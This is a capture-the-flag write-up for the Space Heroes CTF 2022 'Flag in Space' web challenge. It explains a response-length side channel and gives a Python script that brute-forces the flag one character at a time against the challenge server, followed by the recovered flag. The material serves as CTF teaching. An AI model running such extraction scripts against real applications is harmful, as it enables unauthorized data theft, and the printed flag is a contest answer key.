Skip to content

Space Heroes CTF 2022: Flag in Space

TL;DR

  • The application reflects partial flag guesses in server-side logic.
  • A null byte (\x00) stabilizes the baseline response length.
  • Each correct character increases the response size.
  • Use response length as a side channel to brute-force the flag one byte at a time.
  • Repeat until the closing } is found.

Video Walkthrough

Space Heroes CTF 2022 Flag in Space web video walkthrough showing blind response-length flag extraction

Solution

from pwn import *
import requests
import string

context.log_level = 'debug'
url = 'http://172.105.154.14/?flag=shctf{'

response = requests.get(url + '\x00')  # Initial request
correct_response = len(response.text)
info('intitial response length: %d', correct_response)

# Loop until we see the flag
while '}' not in url:
    # Loop possible chars (string.printable)
    for char in '{_}' + string.ascii_lowercase + string.digits:
        response = requests.get(url + char)
        # If this is the correct char, update
        if len(response.text) > correct_response:
            correct_response = len(response.text)
            url = url + char
            info(url)
            break

# Flag plz
warn(url)

Flag: shctf{2_explor3_fronti3r}